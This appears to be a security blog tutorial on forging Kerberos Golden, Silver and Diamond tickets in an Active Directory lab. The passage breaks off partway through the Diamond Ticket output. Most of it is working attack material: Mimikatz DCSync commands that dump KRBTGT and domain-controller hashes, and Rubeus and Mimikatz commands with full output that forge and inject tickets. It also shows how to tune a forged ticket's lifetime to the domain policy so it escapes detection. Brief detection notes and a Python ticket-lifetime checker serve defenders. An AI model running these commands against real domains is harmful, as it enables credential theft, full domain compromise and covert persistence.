If an adversary obtains an account's NTLM hash or AES keys, they can use those values to forge Kerberos tickets. Forged tickets are a common way of maintaining access to an Active Directory environment.
This article looks at three common methods of doing this: Golden, Silver and Diamond Tickets.
Golden Tickets
An adversary with access to a KRBTGT account hash can generate their own Kerberos tickets for any user in a domain, including administrators. This is known as a Golden Ticket Attack.
In older domains the forged user did not need to exist in the domain. Since KB5008380, however, the targeted user account must exist in the domain.
Rubeus can be used to generate forged Kerberos tickets.
Getting Access to the KRBTGT
First we need to obtain the KRBTGT account credentials. This account is the service account for the Kerberos Key Distribution Center (KDC), which handles ticket requests and issues Ticket Granting Tickets (TGTs) for users; its key is what encrypts and signs every TGT in the domain.
We can use Mimikatz to perform a DCSync attack to obtain the KRBTGT account hash:
```
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:BORDERGATE\krbtgt" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /user:BORDERGATE\krbtgt
[DC] 'bordergate.local' will be the domain
[DC] 'DC01.bordergate.local' will be the DC server
[DC] 'BORDERGATE\krbtgt' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 28/04/2024 02:35:48
Object Security ID   : S-1-5-21-1220112391-3624315575-3511410581-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: 9a1b5b20c1959f4bcaf9f4838eba7472
    ntlm- 0: 9a1b5b20c1959f4bcaf9f4838eba7472
    lm  - 0: 6fba1ef75d362808b3594035721f1955

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 7b31ffa11e101561bcf68f2e3df76299

* Primary:Kerberos-Newer-Keys *
    Default Salt : BORDERGATE.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28
      aes128_hmac       (4096) : 9d15c219d740aa2989b4f71b66af6df9
      des_cbc_md5       (4096) : 1cec2c988513b9b9

* Primary:Kerberos *
    Default Salt : BORDERGATE.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 1cec2c988513b9b9

* Packages *
    NTLM-Strong-NTOWF

mimikatz(commandline) # exit
Bye!
```
Creating a Golden Ticket
Next, we use PowerView to get the FQDN of the domain and its associated SID:
```
PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> Get-Domain

Forest                  : bordergate.local
DomainControllers       : {DC01.bordergate.local}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  :
PdcRoleOwner            : DC01.bordergate.local
RidRoleOwner            : DC01.bordergate.local
InfrastructureRoleOwner : DC01.bordergate.local
Name                    : bordergate.local

PS C:\Tools> Get-DomainSID
S-1-5-21-1220112391-3624315575-3511410581
```
We can then use Rubeus with the /ptt flag to forge a ticket for the Administrator user and inject it into our current logon session, which gives us access to the domain controller’s C$ share:
```
C:\Users\alice>dir \\DC01.bordergate.local\C$
Access is denied.

Rubeus.exe golden /aes256:aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28 /user:Administrator /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.0

[*] Action: Build TGT

[*] Building PAC

[*] Domain         : BORDERGATE.LOCAL (BORDERGATE)
[*] SID            : S-1-5-21-1220112391-3624315575-3511410581
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : AEB1AF1A68EE1C76FE30DC91292E628B641B185AB17FDB7139A267130BB44F28
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : AEB1AF1A68EE1C76FE30DC91292E628B641B185AB17FDB7139A267130BB44F28
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : krbtgt
[*] Target         : bordergate.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@bordergate.local'

[*] AuthTime       : 29/04/2024 18:05:12
[*] StartTime      : 29/04/2024 18:05:12
[*] EndTime        : 30/04/2024 01:05:12
[*] RenewTill      : 06/05/2024 18:05:12

[*] base64(ticket.kirbi):

      doIFuTCCBbWgAwIBBaEDAgEWooIEmDCCBJRhggSQMIIEjKADAgEFoRIbEEJPUkRFUkdBVEUuTE9DQUyi
      JTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEGJvcmRlcmdhdGUubG9jYWyjggRIMIIERKADAgESoQMCAQOiggQ2
      BIIEMibyjNIyVS2jRtuufcXCQEvPrkrF69mnqDdgwx3ap11aLkH5ixb2FvzqOvYJ6+GmR8I8s1EftgZF
      J8wn0Fru8NRp01qUHECVrGVUP1pxAPlZ7PPwBrAS0tMlAh8xpXg6NDGtLWIQsJtHvYC8N/BGupKqDjSy
      rcmnpCVjxM4R2rH2NI+ZHt/CSa2yKwNA57ecO91p7xwKOhHsQQMciVdgH0WAmtS0/KMxeK5Bda/Eqqzf
      d+tXS/51Y2jjxYd/muFVMrncD6CkrwZjM8Iq51GZnToxxCXbGV28d/EjJYiIbi9tkHO76MGxozjmuWht
      SRmc3TLDEoN/vOgDXoWy+bFbpxqYL6eVNuk8oDU0u1yochAhNm3j1zq1oZq2TvhO+PKE4s+7E6qhFAGR
      dMCGmPJA0cnAsUwxVr0/nW7Clm5NpNS+gJ8lSsnSoXeNpi+HbyQ7qIVuqU93i/yRDNI4Gvv0wFu7jaun
      yAkcYk6L48jqt9G93ZAkZm5UDo2oJUTcnz+MkdK0n8c+8si9PTzkic+z3avS+HH5YFR4eEnSvCnJ1oJ+
      IFFFe9EmLW41I2VoEsNpHUBMCBZUQeaF5lAcJP35QUbmh6Xa5FMHJ3RzcT95XRnePSunE4ghpgbXPJW0
      wnYJeE3SeBH7EmVh1EJ4uvCL6k13yeeGKInVeFGgnoIPqlbFqywvCDE0wWFaEjt1jCHneP79F++kDVNi
      p8XF85nu1PrwneX+I0JvuNHMUA+cMAkZjGxfkHORFsL/NDamHkwLIcCU0OYwZQnaWxz66NbF2bg7M/SK
      0whu6XBmPufP2X/cm4elyRCxBAHK/KNc1ipHXz2xTJmNZoOiM72Hx5ua0rKXKry3XX5GFUkBTC4YuSO+
      eoHVTupmQHdUSdc+Qtu6iYR5zqeerm7rLd/8PQ+PIS/cnVsUZAcce2lBZ66Q4OTf0r0bMUuy80DD+Vvo
      dpY05dju41dhc19a2h5VOlYRQAmwGb5GOFX0ZlvNU2W8nOFwqiMfC4aGJJTx0fYZR7Eg5oCegtE9Wsce
      J5nbMRYjeJZHVKCcqxZTgO5WTWfyM4Z7YNUDLJ2hLxBen5e2pb5EQTGfJ8Mh+65HX18DDFtMoFEHLO7d
      EeVIrl6jkZE1JaK8doBonMnh0iQadm8EB1XGFrZMVHENipW8kv0nxlXVC+DuqZsZVBKDTXNBtVHfhvsC
      HHpny7nX3R0rNFb1SX2O/01CyxT2N6N+pXY1oMmjizgin/u+iD4NcTVdnOKVBkNJiXhoeEpKcOvznJOp
      g8lSY36iDFFOSR8j+4evz3NgBM3S/ksRj79bRklxPtK6p/RrleLK6RZRUWfdNjUN++BhpGFCgW6qQEb7
      q4bI1KA5MyoEyv4+GWYsbt0y2uaa35qtFItqqqtQB/4Ea1awVH7pYHFcQ88UMXVXdLLCv5IVJgZxCqOC
      AQswggEHoAMCAQCigf8Egfx9gfkwgfaggfMwgfAwge2gKzApoAMCARKhIgQg7CuaxBJK6J3dZ4PUxPrW
      BhILormRb83cgOB1KqdvgZKhEhsQQk9SREVSR0FURS5MT0NBTKIaMBigAwIBAaERMA8bDUFkbWluaXN0
      cmF0b3KjBwMFAEDgAACkERgPMjAyNDA0MjkxNDA1MTJapREYDzIwMjQwNDI5MTQwNTEyWqYRGA8yMDI0
      MDQzMDAwMDUxMlqnERgPMjAyNDA1MDYxNDA1MTJaqBIbEEJPUkRFUkdBVEUuTE9DQUypJTAjoAMCAQKh
      HDAaGwZrcmJ0Z3QbEGJvcmRlcmdhdGUubG9jYWw=

[+] Ticket successfully imported!

C:\Tools>dir \\DC01\C$
 Volume in drive \\DC01\C$ has no label.
 Volume Serial Number is 343D-F2D0

 Directory of \\DC01\C$

08/05/2021  09:20    <DIR>          PerfLogs
28/04/2024  10:27    <DIR>          Program Files
08/05/2021  10:40    <DIR>          Program Files (x86)
28/04/2024  10:21    <DIR>          Users
28/04/2024  10:35    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  50,939,592,704 bytes free
```
The same attack can be performed using Mimikatz:
```
mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /krbtgt:9a1b5b20c1959f4bcaf9f4838eba7472 /user:Administrator /id:500 /ptt
User      : Administrator
Domain    : bordergate.local (BORDERGATE)
SID       : S-1-5-21-1220112391-3624315575-3511410581
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 9a1b5b20c1959f4bcaf9f4838eba7472 - rc4_hmac_nt
Lifetime  : 29/04/2024 18:06:13 ; 27/04/2034 18:06:13 ; 27/04/2034 18:06:13
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ bordergate.local' successfully submitted for current session
```
It’s possible to detect Golden Ticket attacks by:
- Looking for service ticket requests (TGS) that have no corresponding TGT request. Diamond tickets, covered below, avoid this by starting from a genuine TGT request.
- Monitoring for tickets with unusually long lifetimes, such as the ten-year lifetime in the Mimikatz output above.
To make sure the forged ticket’s lifetime matches what is typical for the target environment, we first read the domain’s current Kerberos policy with PowerView:
```
PS C:\Tools> . .\PowerView.ps1
PS C:\Tools> Get-DomainPolicy | select -expand KerberosPolicy

MaxTicketAge         : 10
MaxRenewAge          : 7
MaxServiceAge        : 600
MaxClockSkew         : 5
TicketValidateClient : 1
```
Based on this information, we can set the following flags in Mimikatz to generate tickets that look normal for the target environment:
/startoffset:0 /endin:600 /renewmax:7
```
PS C:\Tools> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /startoffset:0 /endin:600 /renewmax:7 /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /krbtgt:9a1b5b20c1959f4bcaf9f4838eba7472 /user:Administrator /id:500 /ptt
User      : Administrator
Domain    : bordergate.local (BORDERGATE)
SID       : S-1-5-21-1220112391-3624315575-3511410581
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 9a1b5b20c1959f4bcaf9f4838eba7472 - rc4_hmac_nt
Lifetime  : 30/04/2024 18:39:40 ; 01/05/2024 02:39:40 ; 30/04/2024 18:46:40
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ bordergate.local' successfully submitted for current session
```
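Checking a ticket's lifetime against the policy above does not have to rely on the tool's own summary: the .kirbi blob Rubeus prints is a DER-encoded KRB-CRED whose KrbCredInfo carries the client, service and lifetime stamps in the clear. The following Python is an added example, not part of the original post or of Rubeus/Mimikatz; it uses only the standard library, takes the golden-ticket kirbi printed above as its input, and compares the decoded lifetime with the MaxTicketAge/MaxRenewAge values from the Get-DomainPolicy output. The field-path constants follow the KRB-CRED layout in RFC 4120, and the policy defaults are this lab's values, both assumptions for other environments.

```python
import base64
from datetime import datetime, timedelta, timezone

# Sample input: the base64 KRB-CRED that Rubeus printed in the golden-ticket run above (copied from the page).
KIRBI_B64 = (
    "doIFuTCCBbWgAwIBBaEDAgEWooIEmDCCBJRhggSQMIIEjKADAgEFoRIbEEJPUkRFUkdBVEUuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEGJvcmRlcmdhdGUubG9jYWyjggRIMIIERKADAgESoQMCAQOiggQ2"
    "BIIEMibyjNIyVS2jRtuufcXCQEvPrkrF69mnqDdgwx3ap11aLkH5ixb2FvzqOvYJ6+GmR8I8s1EftgZFJ8wn0Fru8NRp01qUHECVrGVUP1pxAPlZ7PPwBrAS0tMlAh8xpXg6NDGtLWIQsJtHvYC8N/BGupKqDjSy"
    "rcmnpCVjxM4R2rH2NI+ZHt/CSa2yKwNA57ecO91p7xwKOhHsQQMciVdgH0WAmtS0/KMxeK5Bda/Eqqzfd+tXS/51Y2jjxYd/muFVMrncD6CkrwZjM8Iq51GZnToxxCXbGV28d/EjJYiIbi9tkHO76MGxozjmuWht"
    "SRmc3TLDEoN/vOgDXoWy+bFbpxqYL6eVNuk8oDU0u1yochAhNm3j1zq1oZq2TvhO+PKE4s+7E6qhFAGRdMCGmPJA0cnAsUwxVr0/nW7Clm5NpNS+gJ8lSsnSoXeNpi+HbyQ7qIVuqU93i/yRDNI4Gvv0wFu7jaun"
    "yAkcYk6L48jqt9G93ZAkZm5UDo2oJUTcnz+MkdK0n8c+8si9PTzkic+z3avS+HH5YFR4eEnSvCnJ1oJ+IFFFe9EmLW41I2VoEsNpHUBMCBZUQeaF5lAcJP35QUbmh6Xa5FMHJ3RzcT95XRnePSunE4ghpgbXPJW0"
    "wnYJeE3SeBH7EmVh1EJ4uvCL6k13yeeGKInVeFGgnoIPqlbFqywvCDE0wWFaEjt1jCHneP79F++kDVNip8XF85nu1PrwneX+I0JvuNHMUA+cMAkZjGxfkHORFsL/NDamHkwLIcCU0OYwZQnaWxz66NbF2bg7M/SK"
    "0whu6XBmPufP2X/cm4elyRCxBAHK/KNc1ipHXz2xTJmNZoOiM72Hx5ua0rKXKry3XX5GFUkBTC4YuSO+eoHVTupmQHdUSdc+Qtu6iYR5zqeerm7rLd/8PQ+PIS/cnVsUZAcce2lBZ66Q4OTf0r0bMUuy80DD+Vvo"
    "dpY05dju41dhc19a2h5VOlYRQAmwGb5GOFX0ZlvNU2W8nOFwqiMfC4aGJJTx0fYZR7Eg5oCegtE9WsceJ5nbMRYjeJZHVKCcqxZTgO5WTWfyM4Z7YNUDLJ2hLxBen5e2pb5EQTGfJ8Mh+65HX18DDFtMoFEHLO7d"
    "EeVIrl6jkZE1JaK8doBonMnh0iQadm8EB1XGFrZMVHENipW8kv0nxlXVC+DuqZsZVBKDTXNBtVHfhvsCHHpny7nX3R0rNFb1SX2O/01CyxT2N6N+pXY1oMmjizgin/u+iD4NcTVdnOKVBkNJiXhoeEpKcOvznJOp"
    "g8lSY36iDFFOSR8j+4evz3NgBM3S/ksRj79bRklxPtK6p/RrleLK6RZRUWfdNjUN++BhpGFCgW6qQEb7q4bI1KA5MyoEyv4+GWYsbt0y2uaa35qtFItqqqtQB/4Ea1awVH7pYHFcQ88UMXVXdLLCv5IVJgZxCqOC"
    "AQswggEHoAMCAQCigf8Egfx9gfkwgfaggfMwgfAwge2gKzApoAMCARKhIgQg7CuaxBJK6J3dZ4PUxPrWBhILormRb83cgOB1KqdvgZKhEhsQQk9SREVSR0FURS5MT0NBTKIaMBigAwIBAaERMA8bDUFkbWluaXN0"
    "cmF0b3KjBwMFAEDgAACkERgPMjAyNDA0MjkxNDA1MTJapREYDzIwMjQwNDI5MTQwNTEyWqYRGA8yMDI0MDQzMDAwMDUxMlqnERgPMjAyNDA1MDYxNDA1MTJaqBIbEEJPUkRFUkdBVEUuTE9DQUypJTAjoAMCAQKh"
    "HDAaGwZrcmJ0Z3QbEGJvcmRlcmdhdGUubG9jYWw="
)

def _tlv(buf, pos):
    """Read one DER tag and length at pos; return (tag, value_start, value_end)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low 7 bits give the number of length bytes that follow
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, pos, pos + length

def walk(buf, start, end, path=(), out=None):
    """Depth-first DER walk; each leaf is stored with the chain of context tags ([0]..[15]) above it."""
    out, pos = [] if out is None else out, start
    while pos < end:
        tag, vs, ve = _tlv(buf, pos)
        sub = path + (tag,) if 0xA0 <= tag <= 0xAF else path
        # Rubeus writes the KrbCredInfo with etype 0, so the "cipher" OCTET STRING is really a
        # plaintext EncKrbCredPart (APPLICATION 29 = 0x7d) that fills the whole string.
        plain = tag == 0x04 and ve > vs and buf[vs] == 0x7D and _tlv(buf, vs)[2] == ve
        if tag & 0x20 or plain:
            walk(buf, vs, ve, sub, out)
        else:
            out.append((sub, tag, buf[vs:ve]))
        pos = ve
    return out

INFO = (0xA3, 0xA2, 0xA0)  # enc-part -> cipher -> ticket-info: path to the KrbCredInfo SEQUENCE

def parse_kirbi(b64):
    """Return client, service and the four lifetime stamps carried in the KrbCredInfo."""
    buf = base64.b64decode(b64)
    if buf[0] != 0x76:  # APPLICATION 22 = KRB-CRED
        raise ValueError("not a KRB-CRED structure")
    leaves = walk(buf, 0, len(buf))
    def strs(*tags):  # GeneralString (0x1b) leaves under INFO + tags
        return [v.decode() for p, t, v in leaves if p == INFO + tags and t == 0x1B]
    def when(tag):  # the single GeneralizedTime (0x18) leaf under INFO + (tag,)
        (v,) = [v for p, t, v in leaves if p == INFO + (tag,) and t == 0x18]
        return datetime.strptime(v.decode(), "%Y%m%d%H%M%SZ").replace(tzinfo=timezone.utc)
    return {"client": "/".join(strs(0xA2, 0xA1)) + "@" + strs(0xA1)[0],
            "service": "/".join(strs(0xA9, 0xA1)) + "@" + strs(0xA8)[0],
            "authtime": when(0xA4), "starttime": when(0xA5),
            "endtime": when(0xA6), "renew_till": when(0xA7)}

def lifetime_findings(info, max_ticket_age=timedelta(hours=10), max_renew_age=timedelta(days=7)):
    """Check the ticket against the Kerberos policy (defaults: the lab's MaxTicketAge 10 h and
    MaxRenewAge 7 days shown above); an empty list means the lifetime blends in."""
    start, end, renew = info["starttime"], info["endtime"], info["renew_till"]
    checks = [(end - start > max_ticket_age, "lifetime exceeds MaxTicketAge"),
              (renew - start > max_renew_age, "renewal window exceeds MaxRenewAge"),
              (renew < end, "renew-till earlier than end time")]
    return [msg for bad, msg in checks if bad]
```

A responder who recovers a .kirbi from disk or memory gets the same view of whether it was tuned to policy; note that the Mimikatz run above, despite the tuned flags, printed a renewal time (18:46:40) that falls before the end time (02:39:40), which the third check reports.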
Silver Tickets
Silver Ticket attacks let an adversary forge service tickets (TGS tickets) for a specific service using that service account’s key. The advantage over Golden Tickets is that no interaction with a domain controller is required, so the attack is potentially stealthier.
Getting Access to a Service Account
First we need to extract the credentials of the service account, in this case the domain controller’s machine account (dc01$):
```
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:BORDERGATE\dc01$" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::dcsync /user:BORDERGATE\dc01$
[DC] 'bordergate.local' will be the domain
[DC] 'DC01.bordergate.local' will be the DC server
[DC] 'BORDERGATE\dc01$' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : DC01

** SAM ACCOUNT **

SAM Username         : DC01$
Account Type         : 30000001 ( MACHINE_ACCOUNT )
User Account Control : 00082000 ( SERVER_TRUST_ACCOUNT TRUSTED_FOR_DELEGATION )
Account expiration   :
Password last change : 28/04/2024 18:36:16
Object Security ID   : S-1-5-21-1220112391-3624315575-3511410581-1000
Object Relative ID   : 1000

Credentials:
  Hash NTLM: e04ae9e43f82df634c9e61d09577acb4

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : BORDERGATE.LOCALhostdc01.bordergate.local
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 80a2a9da3c916b5a7b30bda3b5e35eec1561f065f4307358674c4b93fe5e2423
      aes128_hmac       (4096) : ed536a8d7a0daf906314d7387e8d2845
      des_cbc_md5       (4096) : eaf1fb629e13c81f
    OldCredentials
      aes256_hmac       (4096) : e7637bed1b981202d5497de82f4931d30b06d70068b40037b9e0acc60a124ed9
      aes128_hmac       (4096) : 76935fc442752233880f5aa0b23730e3
      des_cbc_md5       (4096) : 790e8a4cd9dc0413

* Primary:Kerberos *
    Default Salt : BORDERGATE.LOCALhostdc01.bordergate.local
    Credentials
      des_cbc_md5       : eaf1fb629e13c81f
    OldCredentials
      des_cbc_md5       : 790e8a4cd9dc0413

* Packages *
    NTLM-Strong-NTOWF

mimikatz(commandline) # exit
Bye!
```
Creating a Silver Ticket
With the service account hash, we can use Rubeus to generate a Silver Ticket for the CIFS service on the domain controller:
```
C:\Tools>rubeus.exe silver /service:cifs/dc01.bordergate.local /aes256:80a2a9da3c916b5a7b30bda3b5e35eec1561f065f4307358674c4b93fe5e2423 /domain:bordergate.local /sid:S-1-5-21-1220112391-3624315575-3511410581 /ptt /user:dc01$

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.0

[*] Action: Build TGS

[*] Building PAC

[*] Domain         : BORDERGATE.LOCAL (BORDERGATE)
[*] SID            : S-1-5-21-1220112391-3624315575-3511410581
[*] UserId         : 500
[*] Groups         : 520,512,513,519,518
[*] ServiceKey     : 80A2A9DA3C916B5A7B30BDA3B5E35EEC1561F065F4307358674C4B93FE5E2423
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey         : 80A2A9DA3C916B5A7B30BDA3B5E35EEC1561F065F4307358674C4B93FE5E2423
[*] KDCKeyType     : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service        : cifs
[*] Target         : dc01.bordergate.local

[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'dc01$' to 'cifs/dc01.bordergate.local'

[*] AuthTime       : 29/04/2024 18:04:22
[*] StartTime      : 29/04/2024 18:04:22
[*] EndTime        : 30/04/2024 03:04:22
[*] RenewTill      : 06/05/2024 18:04:22

[*] base64(ticket.kirbi):

      doIFdzCCBXOgAwIBBaEDAgEWooIEWzCCBFdhggRTMIIET6ADAgEFoRIbEEJPUkRFUkdBVEUuTE9DQUyi
      KDAmoAMCAQKhHzAdGwRjaWZzGxVkYzAxLmJvcmRlcmdhdGUubG9jYWyjggQIMIIEBKADAgESoQMCAQOi
      ggP2BIID8mIanR3pno2NO0KdJSuHBveCO3YFMIfGov/FXWBYQOeRTy+x9MEl2ylJ25JvGCC/Q6g5n9ol
      84hL8Tm2CyafV55HjJsD+zkvCf0YDAC2tf6YtoCNiGyYv/iH/5ki1Ux6dyok73YHGqvR9jwUnplB2Q11
      nw8itpXz0cpGeB1GWBJztOIZQd81qCga2OLaYZT7EV/yxrWBMRKZ8R7I2jxlC1vJWRfcXim8naEnceHb
      vPbRvL4o2jF+5Wx5kTcSEZXNypwXiz4YLL2W4NE/gJGQnvp6dLG35XpQFM+tr1s8yrysa9By8RO/R3bR
      LG9V36z2f3jckRQmXYEcIzjbGl041ZZoXn8aDSimiqT+gKkVWrCmZcT5E5a0AjmEn/Mq4BuUpHry1M7p
      jPXmKJRqamQeVgcIiig7v+fvEdudZn0eR43EmUSs4AJC0YsuyxS7N25o/yPBZhxorlmVUvPSYtpHkgRX
      NjfePh600wamFHVOlpq7YMYI/v2PUMxzj57i5i5YlSsDMHeNEuaou4A9MmdMvi2hhHiWq7VTnXbJZcJL
      z2XJQ99B+twWrQlWZ+KXiLEpP9f9jezgt9x8LqudSbWNXMQB4XEkTDT8haSgR4aqSsyQnVYzhKcyfoP9
      floiKKrU+sOLlw3Ds3fdphL3KoCXf/OrZshhLBOrYNZZ7q/hQrxdDx6enHYMvLjuMw5cnjJst5knAmwe
      sybb9aaKAvvfao7fWtqfvUcPXBCEirTBrgdMSStd0wMY3J5r0NUThq1vcLRqE89fnbl/B2+V9zkegfN4
      FBxQIKoq2foW1Ome+nJfrn9i2m7nLpM0/GSN684xxF4PTqvYi8qnsmL6SqXWQ/GlAuJVS0GkVUkxUO2T
      YiTz8bTmm3s9a13IPS5VCVRHtSIFfpsv+ApV3kZ+xUgAATxoKao6lqWvy7h3BARiLQd1n875DVHGBahE
      Gyhf2oMBGZGsFT/6eWvR19uivOInOCP2ZpFiiyyKScWuAtk3Pm8P2vqzl8JwUo31k+97IOiVMyFlx2jm
      bHtvB/YrTZhQCWW+Db3mSFhO0cBwYy14lIMtEq4Dzs6HWn8zdAJ3aQDlC+Vv6+CJvyuu/RzFlKE/kwFG
      dDRHE8rFQxjhnIvDmBwBZTFJ0cfCWMf7J8SxtXUbcIWifn2lp73uaMsZw29QSfL7qwqseO/zH+ZK5wee
      XQwvLouPMS9P5FPUVMmNo1LVKfkzvLvZf+Ae/DwhPufFh8qXtplcArtUV8oyOfGdhL5jpNGN02bLNQfv
      rXWgxEIMbrX/nv7RI+t0upX3ICh+5egDPSqoktOEiQuHHQ7bSseTKsWVxhKHkURH/SGRCEDp7RBQo4IB
      BjCCAQKgAwIBAKKB+gSB932B9DCB8aCB7jCB6zCB6KArMCmgAwIBEqEiBCDMn2jXRb/3UrD5ppIp+tg6
      0mBQthnPWbam/idQh1OtiKESGxBCT1JERVJHQVRFLkxPQ0FMohIwEKADAgEBoQkwBxsFZGMwMSSjBwMF
      AECgAACkERgPMjAyNDA0MjkxNjA0MjJapREYDzIwMjQwNDI5MTYwNDIyWqYRGA8yMDI0MDQzMDAyMDQy
      MlqnERgPMjAyNDA1MDYxNjA0MjJaqBIbEEJPUkRFUkdBVEUuTE9DQUypKDAmoAMCAQKhHzAdGwRjaWZz
      GxVkYzAxLmJvcmRlcmdhdGUubG9jYWw=

[+] Ticket successfully imported!

C:\Tools>dir \\dc01.bordergate.local\c$
 Volume in drive \\dc01.bordergate.local\c$ has no label.
 Volume Serial Number is 343D-F2D0

 Directory of \\dc01.bordergate.local\c$

08/05/2021  09:20    <DIR>          PerfLogs
28/04/2024  10:27    <DIR>          Program Files
08/05/2021  10:40    <DIR>          Program Files (x86)
28/04/2024  10:21    <DIR>          Users
28/04/2024  10:35    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  50,926,878,720 bytes free
```
Diamond Tickets
Forged Golden and Silver tickets can be detected because the service ticket requests (TGS) have no corresponding TGT request.
In a Diamond Ticket attack, an adversary requests a valid TGT from a domain controller. The TGT is then decrypted using the KRBTGT account key, modified to meet the adversary’s requirements and re-encrypted. Because a genuine TGT request takes place, the chance of detection is lower than with a Golden Ticket attack.
```
C:\Tools>dir \\dc01.bordergate.local\C$
Access is denied.

C:\Tools>dir \\dc01\C$
Access is denied.

C:\Tools>Rubeus.exe diamond /krbkey:aeb1af1a68ee1c76fe30dc91292e628b641b185ab17fdb7139a267130bb44f28 /tgtdeleg /enctype:aes /ticketuser:Administrator /domain:bordergate.local /ticketuserid:500 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.0

[*] Action: Diamond Ticket

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/DC01.bordergate.local'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
